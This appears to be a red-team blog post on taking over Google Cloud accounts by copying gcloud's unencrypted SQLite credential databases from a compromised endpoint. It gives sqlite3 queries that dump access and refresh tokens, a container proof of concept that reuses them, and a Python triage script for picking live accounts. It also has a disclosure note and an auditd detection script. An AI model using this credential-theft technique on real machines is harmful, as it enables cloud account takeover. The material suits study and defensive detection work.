Compromised Endpoint to Compromised GCP : Gone in 60 Seconds

In this article, we will discuss how you can take over Google Cloud accounts if you have compromised an endpoint. Once you get the hang of it, it takes less than 60 seconds.

A gcloud story

If you are familiar with Google Cloud, you are probably familiar with gcloud as well. It is a very powerful command line tool that lets you do pretty much everything. gcloud (and gsutil in some cases) is to Google Cloud what PowerShell is to Windows.

gcloud keeps its configuration and cached credentials in a per-user directory:

MacOS : /Users/<username>/.config/gcloud/
Linux : /home/<username>/.config/gcloud/
Windows : C:\Users\<username>\AppData\Roaming\gcloud\

Inside it, access_tokens.db holds the cached OAuth access tokens together with their expiry, and credentials.db holds the long-lived credential material, such as the refresh token written by gcloud auth login. Both are ordinary SQLite databases, so the stock sqlite3 client reads them directly (the account_id is a string, so it has to be quoted in the WHERE clause):

$ cd /home/<username>/.config/gcloud
$ sqlite3 access_tokens.db
> select * from access_tokens;
> select account_id, access_token, token_expiry from access_tokens WHERE account_id='redteam-operator-1@redteam.com';
$ sqlite3 credentials.db
> select * from credentials;
> select account_id, value from credentials WHERE account_id='redteam-operator-1@redteam.com';

The Proof of Concept

Now that we have learned some basics, let’s see how we can (ab)use this to our advantage.

Victim

We will authenticate from the victim container, then transfer the two databases from victim to attacker to simulate exfiltration.

root@<victim-container>:/# gcloud auth login --no-launch-browser
root@<victim-container>:/# gcloud projects list

Attacker

Once the victim container has authenticated, copy access_tokens.db and credentials.db into the gcloud config directory of the attacker container (for root, /root/.config/gcloud/). gcloud on the attacker side then lists the stolen identity and can be switched to it:

root@<attacker-container>:/# gcloud auth list
root@<attacker-container>:/# gcloud config set account redteam-operator-1@redteam.com
root@<attacker-container>:/# gcloud projects list

Consideration During Red Team Op

If you run into a user with multiple account_ids in the databases, pick an account whose access token has not expired. Compare each row's token_expiry in access_tokens.db against the current UTC time to find the tokens that are still valid.
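
The triage above, as an added example (this is not code from the original post): it builds two constructed SQLite databases with the same table layout as gcloud's access_tokens.db and credentials.db, then reports per account whether the cached access token is still live and whether a refresh token is present. Two assumptions are made that the page does not state: token_expiry is a naive UTC timestamp string of the form "YYYY-MM-DD HH:MM:SS[.ffffff]" (what gcloud's Python sqlite3 adapter writes), and the credentials.db value column holds the credential JSON with a "refresh_token" field for user accounts. All account names, tokens and times are made up. The caveat a practitioner wants is built in: an expired access token is not a dead end, because a refresh token in credentials.db lets gcloud mint a new one, so credentials.db is the more valuable of the two files.

```python
import json
import os
import sqlite3
import tempfile
from contextlib import closing
from datetime import datetime, timedelta, timezone

REPORT_DEFAULT = {"access_token_valid": False, "has_refresh_token": False}


def parse_expiry(text):
    """Parse a token_expiry string (assumed naive UTC, as gcloud writes it) into an aware datetime."""
    for fmt in ("%Y-%m-%d %H:%M:%S.%f", "%Y-%m-%d %H:%M:%S"):
        try:
            return datetime.strptime(text, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError("unrecognised token_expiry: %r" % (text,))


def triage_gcloud_dir(gcloud_dir, now=None):
    """Map each account_id found in the two databases to what is usable about it."""
    now = now or datetime.now(timezone.utc)
    report = {}

    # credentials.db: one row per account; value is the credential JSON (refresh token for users)
    with closing(sqlite3.connect(os.path.join(gcloud_dir, "credentials.db"))) as db:
        for account_id, value in db.execute("SELECT account_id, value FROM credentials"):
            try:
                blob = json.loads(value)
            except (TypeError, ValueError):
                blob = {}
            entry = report.setdefault(account_id, dict(REPORT_DEFAULT))
            entry["has_refresh_token"] = bool(blob.get("refresh_token"))

    # access_tokens.db: cached bearer tokens; only useful until token_expiry
    with closing(sqlite3.connect(os.path.join(gcloud_dir, "access_tokens.db"))) as db:
        for account_id, token, expiry in db.execute(
                "SELECT account_id, access_token, token_expiry FROM access_tokens"):
            entry = report.setdefault(account_id, dict(REPORT_DEFAULT))
            entry["access_token_valid"] = bool(token) and expiry is not None and parse_expiry(expiry) > now
    return report


def usable_accounts(report):
    """Accounts worth `gcloud config set account`: a live access token, or a refresh token gcloud can redeem."""
    return sorted(a for a, e in report.items() if e["access_token_valid"] or e["has_refresh_token"])


def build_sample_gcloud_dir(now):
    """Write constructed credentials.db and access_tokens.db (gcloud's table layout) into a temp dir."""
    d = tempfile.mkdtemp(prefix="gcloud-sample-")
    fmt = "%Y-%m-%d %H:%M:%S.%f"
    user_cred = {"type": "authorized_user", "client_id": "cid", "client_secret": "csec"}
    with closing(sqlite3.connect(os.path.join(d, "credentials.db"))) as db:
        db.execute("CREATE TABLE credentials (account_id TEXT PRIMARY KEY, value BLOB)")
        db.executemany("INSERT INTO credentials VALUES (?, ?)", [
            ("redteam-operator-1@redteam.com", json.dumps(dict(user_cred, refresh_token="1//FAKE-REFRESH"))),
            ("stale@redteam.com", json.dumps(user_cred)),  # constructed edge case: no refresh token at all
        ])
        db.commit()
    with closing(sqlite3.connect(os.path.join(d, "access_tokens.db"))) as db:
        db.execute("CREATE TABLE access_tokens (account_id TEXT PRIMARY KEY, access_token TEXT, "
                   "token_expiry TIMESTAMP, rapt_token TEXT, id_token TEXT)")
        db.executemany("INSERT INTO access_tokens VALUES (?, ?, ?, NULL, NULL)", [
            ("redteam-operator-1@redteam.com", "ya29.FAKE-EXPIRED", (now - timedelta(minutes=5)).strftime(fmt)),
            ("stale@redteam.com", "ya29.FAKE-OLD", (now - timedelta(days=3)).strftime(fmt)),
            ("cached-only@redteam.com", "ya29.FAKE-LIVE", (now + timedelta(minutes=40)).strftime(fmt)),
        ])
        db.commit()
    return d


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    sample = build_sample_gcloud_dir(now)
    report = triage_gcloud_dir(sample, now)
    for account, entry in sorted(report.items()):
        print(account, entry)
    print("usable:", usable_accounts(report))
```

Point triage_gcloud_dir at a copied config directory and it tells you which account_id to hand to gcloud config set account. An account with neither a live token nor a refresh token is not worth switching to; an account with only a refresh token will work, because gcloud refreshes on first use.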

Clear Text SQLite DB

Both databases sit on disk as plain, unencrypted SQLite files. Any process running as the user (or as root) can open them with the stock sqlite3 client, as shown above, and the rows read back are directly reusable on another machine.

Responsible Disclosure

This issue was reported to Google, and they were asked to at least encrypt the databases on disk as a way to put more obstacles in the attacker's path. They decided not to pursue it as a security bug.

In Conclusion

This is a dangerous technique that can cause heavy damage. There is currently no preventive control that stops it, so the best bet is to detect it.

Effective collaboration between red and blue teams produces offensive defense, a.k.a. the blue team quickly detecting, responding to and disrupting attacker activity.
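
One way the blue team can detect the endpoint side of this technique, as an added example that is not part of the original post: watch the gcloud config directory with Linux auditd and flag any process other than gcloud itself that opens credentials.db or access_tokens.db. The audit watch below (auditctl -w /home/alice/.config/gcloud -p r -k gcloud_creds) and the allowlist of expected reader binaries are assumptions for a hypothetical host; the log lines are constructed to follow the auditd record format, with inode and register fields left out. On the cloud side, reuse of the stolen identity from an unfamiliar source IP and client will also surface in Cloud Audit Logs, which is the other half of this detection.

```python
import re

CRED_FILES = ("credentials.db", "access_tokens.db")

# Hypothetical policy for this host: gcloud runs from the SDK's bundled interpreter,
# so any other binary reading the credential databases is suspicious.
EXPECTED_EXE_PREFIXES = ("/usr/lib/google-cloud-sdk/",)

EVENT_ID_RE = re.compile(r"msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample: serial 901 is gcloud itself, 902/903 are an attacker dumping
# and copying the databases, 904 reads a non-credential file in the same directory.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:901): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=1200 pid=1234 auid=1000 uid=1000 gid=1000 euid=1000 comm="python3" exe="/usr/lib/google-cloud-sdk/platform/bundledpythonunix/bin/python3" key="gcloud_creds"
type=PATH msg=audit(1700000000.101:901): item=0 name="/home/alice/.config/gcloud/credentials.db" mode=0100600 ouid=1000 ogid=1000 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.202:902): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=1300 pid=1345 auid=1000 uid=1000 gid=1000 euid=1000 comm="sqlite3" exe="/usr/bin/sqlite3" key="gcloud_creds"
type=PATH msg=audit(1700000000.202:902): item=0 name="/home/alice/.config/gcloud/credentials.db" mode=0100600 ouid=1000 ogid=1000 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.303:903): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=1300 pid=1350 auid=1000 uid=0 gid=0 euid=0 comm="cp" exe="/usr/bin/cp" key="gcloud_creds"
type=PATH msg=audit(1700000000.303:903): item=0 name="/home/alice/.config/gcloud/access_tokens.db" mode=0100600 ouid=1000 ogid=1000 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.404:904): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=1300 pid=1351 auid=1000 uid=1000 gid=1000 euid=1000 comm="cat" exe="/usr/bin/cat" key="gcloud_creds"
type=PATH msg=audit(1700000000.404:904): item=0 name="/home/alice/.config/gcloud/configurations/config_default" mode=0100600 ouid=1000 ogid=1000 nametype=NORMAL
"""


def parse_record(line):
    """Split one audit record into a dict of its key=value fields plus the event serial."""
    m = EVENT_ID_RE.search(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    fields["serial"] = int(m.group("serial"))
    return fields


def group_events(lines):
    """Join the SYSCALL and PATH records that share a serial into one event."""
    events = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        ev = events.setdefault(rec["serial"], {"paths": []})
        if rec.get("type") == "SYSCALL":
            ev.update({k: rec.get(k) for k in ("exe", "comm", "uid", "auid", "pid", "key")})
        elif rec.get("type") == "PATH" and "name" in rec:
            ev["paths"].append(rec["name"])
    return events


def find_credential_reads(log_text, expected_exe_prefixes=EXPECTED_EXE_PREFIXES):
    """Return events that touched credentials.db/access_tokens.db from an unexpected binary."""
    hits = []
    for serial, ev in sorted(group_events(log_text.splitlines()).items()):
        cred_paths = [p for p in ev["paths"] if p.rsplit("/", 1)[-1] in CRED_FILES]
        if not cred_paths:
            continue
        exe = ev.get("exe", "")
        if exe.startswith(expected_exe_prefixes):
            continue
        hits.append({"serial": serial, "exe": exe, "comm": ev.get("comm"),
                     "uid": ev.get("uid"), "paths": cred_paths})
    return hits


if __name__ == "__main__":
    for hit in find_credential_reads(SAMPLE_AUDIT_LOG):
        print(hit)
```

The exe allowlist is a heuristic: an attacker who reads the databases from a copy of the SDK's own interpreter, or who simply copies the whole home directory, slips past it, so treat a hit as a high-signal alert and the absence of hits as no evidence either way.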